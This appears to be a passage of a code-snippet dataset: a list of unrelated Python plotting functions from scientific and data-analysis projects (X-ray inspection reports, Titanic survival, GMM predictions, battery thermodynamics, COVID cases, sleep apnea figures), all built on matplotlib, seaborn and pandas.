#\n # -----------------------------------------------------------------------#\n y0 = 0.9\n dy = [0.03, 0.025]\n\n ha = 'left'\n va = 'center'\n fs = 10\n dfs = 2\n\n # metric name value unc min\n xpos = [0.0, 0.4, 0.5, 0.75]\n yi = y0 - 0.1 # The position of the text on the y access, which is constantly updated as more text is added\n\n # -----------------------------------------------------------------------------------#\n # Plot the 'summary' page listing all the tests and the overall results - TEXT ONLY #\n # -----------------------------------------------------------------------------------#\n\n # Create the title of the page\n plot_overall_text(data_obj, yi, xpos, ha, va, fs)\n\n #Plot the overall results text of the first test, Steel Differentiation\n\n\n # Plot the overall results text of the second test, Penetration\n yi = yi - dy[0]\n plot_pen_text(data_obj, 2, yi, xpos, ha, va, fs, dfs)\n\n # Plot the overall results text of the third test, Organic Material Detection\n yi = yi - dy[0]\n plot_BSNR_text(data_obj, 3, yi, xpos, ha, va, fs, dfs)\n\n # Plot the overall results text of the fourth test, Spatial Resolution\n yi = yi - dy[0]\n plot_spatial_text(data_obj, 4, yi, yi - dy[1], xpos, ha, va, fs, dfs)\n yi = yi - dy[1] # Make sure the local yi is updated\n\n # Plot the overall results text of the fifth test, Dynamic Range\n yi = yi - dy[0]\n plot_dyn_text(data_obj, 5, yi, xpos, ha, va, fs, dfs)\n\n # Plot the overall results text of the sixth test, Noise\n yi = yi - dy[0]\n plot_noise_text(data_obj, 6, yi, dy, xpos, ha, va, fs, dfs)\n yi = yi - (dy[1] * 2) # Make sure to update yi, as it was only locally changed in 'plot_noise_text()'\n\n # --------------------------------------------------#\n # Plot the footnotes for the overall results page. 
#\n # --------------------------------------------------#\n plot_overall_footnotes(xpos, ha, va, fs, dfs, standard=\"ASTM F792\")\n\n\n #---------------------------------------------------------#\n # Plot the cropped and rotated images from the processing #\n #---------------------------------------------------------#\n plot_images(data_obj, fs) # Plot the images to the pdf\n\n plot_image_footnotes(data_obj, xpos, ha, va, fs, dfs) # Add in the footnotes to the pdf\n\n # NOTE: Above image plotting the same, with the same footnotes, for F792???\n\n #-----------------------------#\n # Steel differentiation plots #\n #-----------------------------#\n if title_pages:\n new_title_page(data_obj, \"Test 1: Steel Differentiation\")\n\n #Call the function to plot the Steel Differentiation results to the pdf\n\n\n #-------------------#\n # Penetration plots #\n #-------------------#\n if title_pages:\n new_title_page(data_obj, \"Test 2: Penetration\")\n\n # Call the function to plot the Steel Penetration results to the pdf\n #plot_steel_pen(data_obj, 2)\n\n #------------#\n # BSNR plots #\n #------------#\n if title_pages:\n new_title_page(data_obj, \"Test 3: Organic Material Detection\")\n\n # Call the function to plot the Organic Material Detection results to the pdf\n plot_BSNR(data_obj, 3, cmap)\n\n #--------------------#\n # Spatial Resolution #\n #--------------------#\n if title_pages:\n new_title_page(data_obj, \"Test 4: Spatial Resolution\")\n\n # Call the function to plot the Spatial Resolution results to the pdf\n plot_spatial_res(data_obj, 4)\n\n #---------------#\n # Dynamic Range #\n #---------------#\n if title_pages:\n new_title_page(data_obj, \"Test 5: Dynamic Range\")\n\n # Call the function to plot the Dynamic Range results to the pdf\n plot_dynamic_range(data_obj, 5)\n\n #-------#\n # Noise #\n #-------#\n if title_pages:\n new_title_page(data_obj, \"Test 6: Noise (NEQ)\")\n\n # Call the function to plot the Noise (NEQ) results to the pdf\n plot_noise(data_obj, 6)\n\n fig = new_pdf_page(data_obj.pdf_obj, open_fig=False)", "def analyze_data(self, bandwith=1):\n data = {\"Topple Count\": self.topple_count, \"Fallen mass\": self.mass_fallen_count}\n print(data)\n\n self.plot()\n self.plot(type='mass')\n self.plot(type='topple')\n self.plot(type='histogram',bandwith=bandwith)\n self.plot(type='pdf',bandwith=bandwith)", "def plot(var):\n # MISSCHIEN KUNNEN WE HIER NOG IETS MEE\n # total_dead = len(train_data[\"Survived\"] == 0)\n # total_survived = len(train_data[\"Survived\"] == 1)\n # died = train_data[train_data[\"Survived\"] == 0][var].value_counts() / total_dead\n # survived = train_data[train_data[\"Survived\"] == 1][var].value_counts() / total_survived\n sns.set()\n sns.set_color_codes(\"pastel\")\n\n # order bars for family size variable\n if var == \"FamSize\":\n sns.barplot(x=var, y=\"Survived\", data=train_data, color=\"b\",\\\n capsize=.1, errwidth=.7, order=[\"alone\", 1, 2, 3, \"4 or more\"]).\\\n tick_params(labelsize=18)\n else:\n sns.barplot(x=var, y=\"Survived\", data=train_data, color=\"b\",\\\n capsize=.1, errwidth=1.1).tick_params(labelsize=18)\n\n # plot style properties\n ax = plt.gca()\n\n for ax in plt.gcf().axes:\n x = ax.get_xlabel()\n y = ax.get_ylabel()\n ax.set_xlabel(x, fontsize=20)\n ax.set_ylabel(y, fontsize=20)\n\n plt.title(\"Ratio of survivors for variable \" + str(var), fontsize=22)\n t = ax.title\n t.set_position([.5, 1.05])\n plt.ylim([0, 1])\n plt.subplots_adjust(bottom=.15, left=.15)\n plt.savefig(\"results/survived_\" + str(var) + \".png\", 
bbox_inches=\"tight\")\n\n plt.show()", "def plot_ppplot(obj1,sheet1,variable1,obj2,sheet2,variable2,title,opath):\n p1 = np.percentile(obj1.me[sheet1][variable1],range(0,101,1))\n p2 = np.percentile(obj2.me[sheet2][variable2],range(0,101,1))\n p1c = np.cumsum(np.array(p1))/np.cumsum(np.array(p1)).max()\n p2c = np.cumsum(np.array(p2))/np.cumsum(np.array(p2)).max()\n fig = plt.figure(figsize=(8,8),dpi=120)\n plt.scatter(p1c,p2c,color='#566c73',s=30)\n plt.plot([0,1],[0,1],color='red',alpha=0.3)\n plt.xlim(0,1)\n plt.ylim(0,1)\n plt.grid()\n plt.xlabel(sheet1+'_'+variable1)\n plt.ylabel(sheet2+'_'+variable2)\n plt.title(title)\n plt.savefig(opath+'.png')\n plt.close()", "def plot_observed_predictions(self):\n \n # Plot of X vs Y\n fig = plt.figure(figsize=(15,5))\n plt.subplot(1,3,1) \n for k in self.phd_filter['estimated_positions'].keys():\n plt.plot(self.phd_filter['estimated_positions'][k][0], self.phd_filter['estimated_positions'][k][1], 'bx')\n plt.xlabel(\"X\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n \n # Plot of time vs X\n plt.subplot(1,3,2)\n for k in self.phd_filter['estimated_positions'].keys(): \n plt.plot(k*np.ones(self.phd_filter['estimated_positions'][k].shape[1]), self.phd_filter['estimated_positions'][k][0], 'bx')\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"X\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n\n # Plot of time vs Y\n plt.subplot(1,3,3)\n for k in self.phd_filter['estimated_positions'].keys():\n plt.plot(k*np.ones(self.phd_filter['estimated_positions'][k].shape[1]), self.phd_filter['estimated_positions'][k][1], 'bx')\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n plt.show();", "def plot_gmm_preds(x, z, with_supervision, plot_id):\n plt.figure(figsize=(12, 8))\n plt.title('{} GMM Predictions'.format('Semi-supervised' if with_supervision else 'Unsupervised'))\n plt.xlabel('x_1')\n plt.ylabel('x_2')\n\n for x_1, x_2, z_ in zip(x[:, 0], x[:, 1], z):\n color = 'gray' if z_ < 0 else PLOT_COLORS[int(z_)]\n alpha = 0.25 if z_ < 0 else 0.75\n plt.scatter(x_1, x_2, marker='.', c=color, alpha=alpha)\n\n file_name = 'pred{}_{}.pdf'.format('_ss' if with_supervision else '', plot_id)\n save_path = os.path.join('.', file_name)\n plt.savefig(save_path)", "def plot_gmm_preds(x, z, with_supervision, plot_id):\n plt.figure(figsize=(12, 8))\n plt.title('{} GMM Predictions'.format('Semi-supervised' if with_supervision else 'Unsupervised'))\n plt.xlabel('x_1')\n plt.ylabel('x_2')\n\n for x_1, x_2, z_ in zip(x[:, 0], x[:, 1], z):\n color = 'gray' if z_ < 0 else PLOT_COLORS[int(z_)]\n alpha = 0.25 if z_ < 0 else 0.75\n plt.scatter(x_1, x_2, marker='.', c=color, alpha=alpha)\n\n file_name = 'pred{}_{}.pdf'.format('_ss' if with_supervision else '', plot_id)\n save_path = os.path.join('.', file_name)\n plt.savefig(save_path)", "def plot4(self, plog=False):\n\n probs = pd.read_csv(self.probfile)\n\n plt.rc('font', size=14)\n fig, ax = plt.subplots()\n plt.plot(self.ds.freq, self.snr, 'k-', alpha=0.5, zorder=1)\n\n # plot the SNR range to search across when finding snr_modes\n for idx, line in enumerate(self.ds.mode_id['f0']):\n w = np.exp(self.ds.mode_id['w0'][idx])\n plt.axvline(x=line-w, color='b', linestyle='-', alpha=0.4)\n plt.axvline(x=line+w, color='b', linestyle='-', alpha=0.4)\n\n # overplot the predicted SNR values at the modes\n plt.scatter(probs['f0'], probs['SNR_Kepler'], label='Kepler - 4yrs', alpha=1, zorder=2)\n plt.scatter(probs['f0'], probs['SNR_TESS365'], label='TESS - 1 yr', alpha=1, zorder=3)\n 
plt.scatter(probs['f0'], probs['SNR_TESS27'], label='TESS - 27 days', alpha=1, zorder=4)\n\n if plog:\n plt.xscale('log')\n plt.yscale('log')\n plt.xlabel(r'$\\nu$ / $\\rm \\mu Hz$')\n plt.ylabel(r'SNR')\n\n mn = min(star.ds.mode_id['f0']) -\\\n (max(star.ds.mode_id['f0'])-min(star.ds.mode_id['f0']))/7.\n mx = max(star.ds.mode_id['f0']) +\\\n (max(star.ds.mode_id['f0'])-min(star.ds.mode_id['f0']))/7.\n plt.xlim([mn,mx])\n\n plt.legend()\n plt.title('KIC ' + str(self.ds.epic))\n plt.show()\n fig.savefig(os.getcwd() + os.sep + 'DetTest1_plots' + os.sep +\\\n 'plot4_SNR' + self.ds.epic + '.pdf')", "def plot_data(indf, prefix='html'):\n list_of_plots = []\n# scatter_matrix(indf)\n# pl.savefig('scatter_matrix.png')\n# list_of_plots.append('scatter_matrix.png')\n\n for col in indf:\n pl.clf()\n# cond = indf[col].notnull()\n# v = indf[cond][col]\n v = indf[col]\n# nent = len(v)\n# hmin, hmax = v.min(), v.max()\n# xbins = np.linspace(hmin,hmax,nent)\n# hmin, hmax, nbin = BOUNDS[col]\n# xbins = np.linspace(hmin, hmax, nbin)\n v.hist(bins=20, histtype='step', normed=True, log=True)\n pl.title(col)\n pl.savefig('%s_hist.png' % col)\n list_of_plots.append('%s_hist.png' % col)\n\n create_html_page_of_plots(list_of_plots, prefix)\n return", "def display(self):\r\n \r\n plt.rcParams['font.size'] = 14\r\n plt.rcParams['axes.linewidth'] = 1.2 # 1.2 for single plot, 0.5 for all 6\r\n plt.rcParams['lines.linewidth'] = 20.0 # Aah, this doesn't work because line width is changed later on\r\n\r\n cwd = os.getcwd() # Gets current working directory.\r\n cwd = cwd.replace('\\\\', '/')\r\n path = cwd + directory # This is the folder all the results are stored in.\r\n \r\n if type(array_element) == str:\r\n dataframes = [file + array_element] # This is to pass a single csv file\r\n else:\r\n dataframes = [file + i for i in array_element] # This is a list so you can pass multiple csv files to be overlayed on the same plot.\r\n\r\n colours = ['black', 'darkred', 'darkmagenta', 'darkturquoise', 'saddlebrown'] # Array of colours for the lines.\r\n\r\n dfE = pd.read_csv(cwd + \"/experimental_data.csv\") # Reads in the experimental data as a pandas dataframe.\r\n\r\n # Rescale the x-axis of the experimental data.\r\n ratio_of_capacities = 272.4 / 338.313338 # experimental maximum capacity / theoretical maximum capacity\r\n dfE[\"x_theo\"] = ratio_of_capacities * dfE[\"x\"]\r\n # 'x' is the experimental x and 'x_theo' is the theoretical x.\r\n\r\n # Second derivative of enthalpy for experimental data. One w/ respect to the experimental x and one w/ respect to theoretical x.\r\n secder_enthalpy_experimental_x = np.gradient(np.array(dfE['Enthalpy dH/dx']), np.array(dfE['x']))\r\n secder_enthalpy_experimental_x_theo = np.gradient(np.array(dfE['Enthalpy dH/dx']), np.array(dfE['x_theo']))\r\n dfE['secder enthalpy x'] = secder_enthalpy_experimental_x\r\n dfE['secder enthalpy x theo'] = secder_enthalpy_experimental_x_theo\r\n\r\n # vertical shift on p.m. entropy for vibrational effect\r\n vibrational_shift = 0.0108 # eV K this includes being multiplied by the ratio of capacities.\r\n dfE[\"Entropy dS/dx\"] = (dfE[\"Entropy dS/dx\"]) - vibrational_shift\r\n\r\n # Integrates the p.m. 
entropy\r\n entropy_list_experimental = integrate.cumtrapz(dfE['Entropy dS/dx'], dfE['x'],\r\n initial=0) # Contains the entropy values\r\n dfE['Entropy'] = entropy_list_experimental\r\n\r\n dfE['x_new'] = ((dfE['x_theo'] - dfE['x_theo'].iloc[0]) * dfE['x_theo'][73]) / (dfE['x_theo'][73] - dfE['x_theo'].iloc[0]) # Rescales the line so that the experimental data starts at 0.\r\n dfE['x'] = ((dfE['x'] - dfE['x'].iloc[0]) * dfE['x'][73]) / (dfE['x'][73] - dfE['x'].iloc[0]) # Same as above but for experimental x axis.\r\n\r\n # Calculates the analytical solution\r\n points = 1000\r\n x_pos = np.linspace(0, 1, points) # x for p.m. entropy\r\n y_pos = np.linspace(0, 1, points) # y for p.m. etropy\r\n s_x = np.linspace(0, 1, points) # x for entropy\r\n s_y = np.linspace(0, 1, points) # y for entropy\r\n l = 0.329217689 # This must be the same as what was used in the main script\r\n R = -0.0000862 # eV/K.Site\r\n T = 288 # K\r\n for index, x in enumerate(x_pos):\r\n if x < l:\r\n s_y[index] = (R * (x * np.log(x / l) - (x - l) * np.log((l - x) / l))) * T\r\n y_pos[index] = T * R * (np.log(x / l) - np.log((l - x) / l))\r\n else:\r\n s_y[index] = (R * l * (\r\n (x / l - 1) * np.log(x / l - 1) + (1 - x) / l * np.log((1 - x) / l) - (1 - l) / l * np.log(\r\n (1 - l) / l))) * T\r\n y_pos[index] = T * R * (np.log(x / l - 1) - np.log(1 / l - x / l))\r\n\r\n # Calculates the single solid state entropy\r\n x_ent = np.linspace(0, 1, points)\r\n y_ent = np.linspace(0, 1, points)\r\n for index, x in enumerate(x_ent):\r\n y_ent[index] = T * R * (x * np.log(x) + (1-x) * np.log(1-x))\r\n \r\n \"\"\"\r\n #\r\n #\r\n # Create plot and formats\r\n #\r\n #\r\n \"\"\"\r\n \r\n fig, axes = plt.subplots(nrows=num_row, ncols=num_col, constrained_layout=True, squeeze=False)\r\n # squeeze=False is needed to prevent errors when plotting a single subplot\r\n plt.rc('legend', fontsize=13, handlelength=1)\r\n plt.rc('tick')\r\n lw = 1.5 # Line width\r\n \r\n plt.tick_params(bottom=True, top=True, left=True, right=True)\r\n plt.tick_params(labelbottom=True, labeltop=False, labelleft=True, labelright=False)\r\n plt.tick_params(direction='in', width=1.2, length=4.5, pad=3) # For single plot\r\n # plt.tick_params(direction='in', width=1, length=4.5, pad=3) # For multiple plots\r\n\r\n marker_list = ['v', '^', 'p', 'o']\r\n mark_size = 3 #0.7 for 6 plots\r\n \r\n colours = ['#176ba0', '#af4bce', 'orangered', '#48a11b', '#3caea3'] #'#af4bce'\r\n common_legend = ['400 Averaging Steps', '800 Averaging Steps', '2000 Averaging Steps']\r\n \r\n if num_col==2 and num_row==3: # This will work when using the original axes dimensions (3 rows, 2 columns)\r\n placement = dict([\r\n ('voltage', axes[0, 0]),\r\n ('dS/dx', axes[0, 1]),\r\n ('dQ/dV', axes[1, 0]),\r\n ('dH/dx', axes[1, 1]),\r\n ('S', axes[2, 0]),\r\n ('d/dx(dH/dx)', axes[2, 1])\r\n ])\r\n else: # If axes dimensions are different, I'm probably trying to plot one graph\r\n \"\"\"\r\n If plotting more than one graph, the position on the plot in the subplot can be adjusted\r\n by appropriately altering the axes[] parameter. 
For the graphs that are not being plotted, \r\n leave their position as axes[0, 0].\r\n \"\"\"\r\n placement = dict([\r\n ('voltage', axes[0, 0]),\r\n ('dS/dx', axes[0, 0]),\r\n ('dQ/dV', axes[0, 0]),\r\n ('dH/dx', axes[0, 0]),\r\n ('S', axes[0, 0]),\r\n ('d/dx(dH/dx)', axes[0, 0])\r\n ])\r\n \r\n # Plots all of the experimental data\r\n if experimental_plot == True:\r\n if pick_plot['voltage'] == True:\r\n dfE.plot(linestyle='-', color='darkgreen', lw=lw, ax=placement['voltage'], x='x_new', y='OCV')\r\n dfE.plot(linestyle='-', color='darkblue', lw=lw, ax=placement['voltage'], x='x', y='OCV')\r\n \r\n if pick_plot['dS/dx'] == True:\r\n ax2 = dfE.plot(linestyle='-', color='darkgreen', lw=lw, ax=placement['dS/dx'], x='x_new', y='Entropy dS/dx')\r\n dfE.plot(linestyle='-', color='darkblue', lw=lw, ax=placement['dS/dx'], x='x', y='Entropy dS/dx')\r\n \r\n if pick_plot['dQ/dV'] == True:\r\n dfE.plot(linestyle='-', color='darkgreen', lw=lw, ax=placement['dQ/dV'], x='OCV', y='dQdV') \r\n \r\n if pick_plot['dH/dx'] == True:\r\n dfE.plot(linestyle='-', color='darkgreen', lw=lw, ax=placement['dH/dx'], x='x_new', y='Enthalpy dH/dx')\r\n dfE.plot(linestyle='-', color='darkblue', lw=lw, ax=placement['dH/dx'], x='x', y='Enthalpy dH/dx')\r\n \r\n if pick_plot['S'] == True:\r\n ax5 = dfE.plot(linestyle='-', color='darkgreen', lw=lw, ax=placement['S'], x='x_new', y='Entropy')\r\n \r\n if pick_plot['d/dx(dH/dx)'] == True:\r\n dfE.plot(linestyle='-', color='darkgreen', lw=lw, ax=placement['d/dx(dH/dx)'], x='x_new', y='secder enthalpy x theo')\r\n dfE.plot(linestyle='-', color='darkblue', lw=lw, ax=placement['d/dx(dH/dx)'], x='x', y='secder enthalpy x')\r\n\r\n # Iterate through all the data to be plotted\r\n if simulation_plot == True:\r\n for count, df in enumerate(dataframes):\r\n df1 = pd.read_csv(path + df) # reads file into a dataframe.\r\n \r\n df1 = df1.replace(0, np.nan).dropna(axis=0, how='all') # For the rows with all '0' entries they are replaced with 'nan' and then these rows are dropped.\r\n df1 = df1.replace(np.nan, 0) # As some legitimate 0 entries such as 0 volts we flip back the remaining from 'nan' to 0.\r\n \r\n # Integrates the p.m. entropy\r\n entropy_list = integrate.cumtrapz(df1['Partial molar entropy'], df1['Total mole fraction'],\r\n initial=0) # Contains the entropy values\r\n df1['Entropy'] = entropy_list\r\n \r\n # Rescale voltage profile and p.m. enthalpy by the chain rule.\r\n df1[\"adjusted voltage\"] = df1[\"Chemical potential\"] * ratio_of_capacities\r\n df1[\"adjusted enthalpy\"] = df1[\"Partial molar enthalpy\"] * ratio_of_capacities\r\n df1[\"adjusted entropy\"] = df1[\"Partial molar entropy\"] * ratio_of_capacities\r\n df1[\"adjusted dq/de\"] = df1[\"dq/de\"] * (1/ratio_of_capacities)**2\r\n \r\n # Differentiate the p.m. 
enthalpy to get the second derivative.\r\n pm_enthalpy = np.array(df1['adjusted enthalpy'])\r\n mole_fraction = np.array(df1['Total mole fraction'])\r\n secder_enthalpy = np.gradient(pm_enthalpy, mole_fraction)\r\n df1['secder enthalpy'] = secder_enthalpy\r\n \r\n if pick_plot['voltage'] == True:\r\n ax1 = df1.plot(linestyle='-', color=colours[count], lw=lw, marker=marker_list[count], markeredgecolor=colours[count],\r\n markersize=mark_size, ax=placement['voltage'], x='Total mole fraction', y='adjusted voltage')\r\n ax1.set_xlim([0, 1])\r\n ax1.set_xlabel('Na content $[x]$')\r\n ax1.set_ylabel('Voltage $[V]$')\r\n ax1.legend(common_legend) \r\n # ax1.legend(['Experimental data (Adjusted x)', 'Raw experimental data', 'Monte Carlo data'])\r\n \r\n if pick_plot['dS/dx'] == True:\r\n ax2 = df1.plot(linestyle='-', color=colours[count], lw=lw, marker=marker_list[count], markeredgecolor=colours[count],\r\n markersize=mark_size, ax=placement['dS/dx'], x='Total mole fraction', y='adjusted entropy')\r\n # ax2.plot(x_pos, y_pos, linewidth=lw, color='red') # Plots the ideal p.m. entropy\r\n ax2.set_xlim([0, 1])\r\n ax2.set_xlabel('Na content $[x]$')\r\n ax2.set_ylabel('$\\\\frac{dS}{dx}$ $[eV K/site]$')\r\n ax2.legend(common_legend) \r\n # ax2.legend(['Experimental data (Adjusted x)', 'Raw experimental data', 'Monte Carlo data', 'Analytical solution'])\r\n \r\n if pick_plot['dQ/dV'] == True:\r\n ax3 = df1.plot(linestyle='-', color=colours[count], lw=lw, marker=marker_list[count], markeredgecolor=colours[count],\r\n markersize=mark_size, ax=placement['dQ/dV'], x='Chemical potential', y='adjusted dq/de') \r\n ax3.set_xlim([-0.1, 1])\r\n ax3.set_xlabel('Voltage $[V]$')\r\n ax3.set_ylabel('$\\\\frac{dQ}{dV}$ [$\\mathregular{eV^{-1}}$]')\r\n ax3.legend(common_legend)\r\n # ax3.legend(['Experimental data', 'Monte Carlo Data'])\r\n \r\n if pick_plot['dH/dx'] == True:\r\n ax4 = df1.plot(linestyle='-', color=colours[count], lw=lw, marker=marker_list[count], markeredgecolor=colours[count],\r\n markersize=mark_size, ax=placement['dH/dx'], x='Total mole fraction', y='adjusted enthalpy')\r\n ax4.set_xlim([0, 1])\r\n ax4.set_xlabel('Na content $[x]$')\r\n ax4.set_ylabel('$\\\\frac{dH}{dx}$ $[eV/site]$')\r\n ax4.legend(common_legend) \r\n # ax4.legend(['Experimental data (Adjusted x)', 'Raw experimental data', 'Monte Carlo data'])\r\n \r\n if pick_plot['d/dx(dH/dx)'] == True:\r\n ax5 = df1.plot(linestyle='-', color=colours[count], lw=lw, marker=marker_list[count], markeredgecolor=colours[count],\r\n markersize=mark_size, ax=placement['d/dx(dH/dx)'], x='Total mole fraction', y='secder enthalpy')\r\n ax5.set_xlim([0, 1])\r\n ax5.set_ylim([0, 6])\r\n ax5.set_xlabel('Na content $[x]$')\r\n ax5.set_ylabel('$\\\\frac{d^2H}{dx^2}$ $[eV/site]$')\r\n ax5.legend(common_legend)\r\n \r\n # ax5.legend(['Experimental data (Adjusted x)', 'Raw experimental data', 'Monte Carlo data'])\r\n \r\n if pick_plot['S'] == True:\r\n ax6 = df1.plot(linestyle='-', color=colours[count], lw=lw, marker=marker_list[count], markeredgecolor=colours[count],\r\n markersize=mark_size, ax=placement['S'], x='Total mole fraction', y='Entropy')\r\n \r\n # ax6.plot(s_x, s_y, linewidth=lw, color='red') # Plots the entropy for l=0.32...\r\n # ax6.plot(x_ent, y_ent, linewidth=lw, color='grey') # Plots the entropy for solid state solution.\r\n ax6.set_xlim([0, 1])\r\n ax6.set_xlabel('Na content $[x]$')\r\n ax6.set_ylabel('S $[eV K/site]$')\r\n ax6.legend(common_legend)\r\n # ax6.legend(['Experimental data', 'Monte Carlo data', 'Analytical solution', 'Solid 
state solution'], loc='upper right', bbox_to_anchor=(0.75, 0.5))\r\n \r\n \r\n\r\n # parameter_file = open(path + \"/Input_arguments_\" + uid + \".txt\", \"w\")\r\n # parameter_file.write(str(self.args))\r\n # parameter_file.close()\r\n\r\n # manager = plt.get_current_fig_manager()\r\n # # manager.resize(*manager.window.maxsize())\r\n # # fig_path = cwd + \"/Na_plot_results.png\"\r\n # # plt.savefig(path + \"/Na_monte_carlo_plot_\" + uid + \".png\")\r\n # plt.show()\r\n \r\n plt.savefig(\"Varying sps Overlaid Plots - dQ_dV\", dpi = 300)\r\n\r\n plt.show()", "def grafCasosAtivos(tipPDF):\n\n\t\tdf = pd.read_csv('dadosPaises.csv') #dataFrame que recebe a tabela de dados\n\t\tdf = df.sort_values(by=['Casos Ativos'], ascending=False) #ordena pela coluna 'casos ativos' de forma descendente\n\t\tdf2 = df[:5] # Separa em um novo dataframe as 5 primeiras linhas\n\n\t\tfig, ax = plt.subplots()\n\n\t\tindex = np.arange(len(df2['Casos Ativos'])) #indice para definir as posicoes dos labels\n\t\tbar_width = 0.45 #grossura da barra\n\t\tscore_label = np.arange(0,50000,5000) #array com volares a serem apresentados no eixo y\n\t\tbar = ax.bar(index, df2['Casos Ativos'], bar_width, label='Casos Ativos',color='#ff4500')\n\t\t\n\t\t#setting axis labels\n\t\tax.set_xticks(index) #distancia entre barras\n\t\tax.set_xticklabels(df2['Dados do País']) #label das barras\n\t\tax.set_yticks(score_label) #distancia entre marcas do eixo y\n\t\tax.set_yticklabels(score_label) #labels das marcas do eixo y\n\t\tax.legend() #legenda\n\n\t\t#ciclo para plotar os labels\n\t\tfor i in index:\n\t\t\tax.annotate('{}'.format(bar[i].get_height()), #string a ser plotada\n\t\t\t\t\t\txy=(bar[i].get_x(),bar[i].get_height()), #local da plotagem do label\n\t\t\t\t\t\txytext=(0,2), #movimentacao adicional do label\n\t\t\t\t\t\ttextcoords='offset points',\n\t\t\t\t\t\tva='bottom'\n\t\t\t\t\t\t)\n\n\t\tplt.title('Paises com mais casos ativos')\n\n\t\t#Se true, o tipo selecionado sera pdf, senao png\n\t\tif tipPDF:\n\t\t\tnomFig = 'grafico.pdf'\n\t\telse :\n\t\t\tnomFig = 'grafico.png'\t\n\t\tplt.savefig(nomFig) #salva a imagem (poder ser salvo como pdf mudando o nome do arquivo", "def plot_data_pca(data_dict):\n f = plt.figure()\n ndata, ntime, nhidden = data_dict['hiddens'].shape\n\n print('Number of data examples: ', ndata)\n print('Number of timesteps: ', ntime)\n print('Number of data dimensions: ', nhidden)\n pca = PCA(n_components=100)\n pca.fit(onp.reshape(data_dict['hiddens'], [ndata * ntime, nhidden]))\n\n plt.plot(onp.arange(1, 16), onp.cumsum(pca.explained_variance_ratio_)[0:15],\n '-o');\n plt.plot([1, 15], [0.95, 0.95])\n plt.xlabel('PC #')\n plt.ylabel('Cumulative Variance')\n plt.xlim([1, 15])\n plt.ylim([0.3, 1]);\n return f", "def figure_2(df):\n\n sns.set(style=\"white\", palette=sns.color_palette(\"cubehelix\", 6))\n f, axes = plt.subplots(4, 1, figsize=(6, 9)) # , sharex=True)\n sns.despine(top=True, bottom=True)\n # f.suptitle(\"Etiology of Central Events, Grouped by %Central Events\")\n\n OSA_pure_hist = replace_etiology_labels(histo_dx_includes(df.loc[df['BaseDx'] == \"Mainly OSA\"], return_df=True).sort_values(\"Dx\"))\n OSA_predom_hist = replace_etiology_labels(histo_dx_includes(df.loc[df['BaseDx'] == \"Combined OSA/CSA\"], return_df=True).sort_values(\"Dx\"))\n CSA_predom_hist = replace_etiology_labels(histo_dx_includes(df.loc[df['BaseDx'] == \"Predominantly CSA\"], return_df=True).sort_values(\"Dx\"))\n CSA_pure_hist = replace_etiology_labels(histo_dx_includes(df.loc[df['BaseDx'] == \"Pure CSA\"], 
return_df=True).sort_values(\"Dx\"))\n\n # Create count plot for each #CSA on the left, then a Pie Chart with proportion on the right\n\n hatches = ['///', 'xxx', '---', '', '']\n face_color = ['white', 'white', 'white', 'white', 'dimgrey']\n\n # Pure OSA\n bar = sns.barplot(x=\"Count\", y=\"Dx\", data=OSA_pure_hist, ax=axes[3])\n for i, this_bar in enumerate(bar.patches):\n # Set a different hatch for each bar\n this_bar.set_edgecolor('black')\n this_bar.set_facecolor(face_color[i])\n this_bar.set_hatch(hatches[i])\n axes[3].set(xlabel=\"Number of Patients\", ylabel=\"<10% CSA\")\n\n # Predom OSA\n bar = sns.barplot(x=\"Count\", y=\"Dx\", data=OSA_predom_hist, ax=axes[2])\n for i, this_bar in enumerate(bar.patches):\n # Set a different hatch for each bar\n this_bar.set_edgecolor('black')\n this_bar.set_facecolor(face_color[i])\n this_bar.set_hatch(hatches[i])\n axes[2].set(xlabel=\"\", ylabel=\"10-49.9% CSA\")\n\n # Predom CSA\n bar = sns.barplot(x=\"Count\", y=\"Dx\", data=CSA_predom_hist, ax=axes[1])\n for i, this_bar in enumerate(bar.patches):\n # Set a different hatch for each bar\n this_bar.set_edgecolor('black')\n this_bar.set_facecolor(face_color[i])\n this_bar.set_hatch(hatches[i])\n axes[1].set(xlabel=\"\", ylabel=\"50-90% CSA\")\n\n # Pure CSA\n bar = sns.barplot(x=\"Count\", y=\"Dx\", data=CSA_pure_hist, ax=axes[0])\n for i, this_bar in enumerate(bar.patches):\n # Set a different hatch for each bar\n this_bar.set_edgecolor('black')\n this_bar.set_facecolor(face_color[i])\n this_bar.set_hatch(hatches[i])\n axes[0].set(xlabel=\"\", ylabel=\">90% CSA\")\n\n # Combined X axis for L side\n axes[3].get_shared_x_axes().join(axes[3], axes[2], axes[1], axes[0])\n axes[0].set_xticklabels(\"\")\n axes[1].set_xticklabels(\"\")\n axes[2].set_xticklabels(\"\")\n # Leave bottom aka [3,0] labels in\n\n # Resize all\n axes[0].autoscale()\n axes[1].autoscale()\n axes[2].autoscale()\n axes[3].autoscale()\n\n f.tight_layout(rect=[0, 0, 1, 1]) # .95 to leave space for title\n f.savefig('Figure 2 - etio by perc csa', dpi=100)\n # plt.show()", "def plot_word_class_pr_genre(df):\n df['nouns'] = df['nouns'] * 100\n df['verbs'] = df['verbs'] * 100\n df['adverbs'] = df['adverbs'] * 100\n # plotting nouns\n plotting_helper_method('nouns', 'genre', df)\n plt.title('Amount of nouns pr song pr. genre')\n plt.xlabel(\"Amount of nouns in each song\")\n plt.ylabel('Genre')\n plt.legend()\n plt.show()\n # plt.savefig('src/visualization/feature_plots/nouns_pr_genre_plot')\n\n # plotting verbs\n plotting_helper_method('verbs', 'genre', df)\n plt.title('Amount of verbs pr song pr. genre')\n plt.xlabel('Amount of verbs in each song')\n plt.ylabel('Genre')\n plt.legend()\n plt.show()\n # plt.savefig('src/visualization/feature_plots/verbs_pr_genre_plot')\n\n # plotting adverbs\n plotting_helper_method('adverbs', 'genre', df)\n plt.title('Amount of adverbs pr song pr. genre')\n plt.xlabel('Amount of adverbs in each song')\n plt.ylabel('Genre')\n plt.legend()\n plt.show()\n # plt.savefig('src/visualization/feature_plots/adverbs_pr_genre_plot')" ]
